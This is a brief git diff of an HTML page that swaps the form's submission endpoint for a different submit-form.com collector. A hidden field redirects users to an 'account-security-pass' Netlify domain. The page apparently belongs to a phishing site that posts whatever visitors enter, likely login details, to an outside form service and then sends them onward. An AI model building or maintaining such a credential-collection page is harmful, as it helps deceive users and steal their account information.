--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/EEUclkF7O" method="post">
+        <form action="https://submit-form.com/19fxiOsqY" method="post">
             <input type="hidden" name="_redirect" value="https://account-security-pass.netlify.app/"/>
             <div id="root">
                 <div>
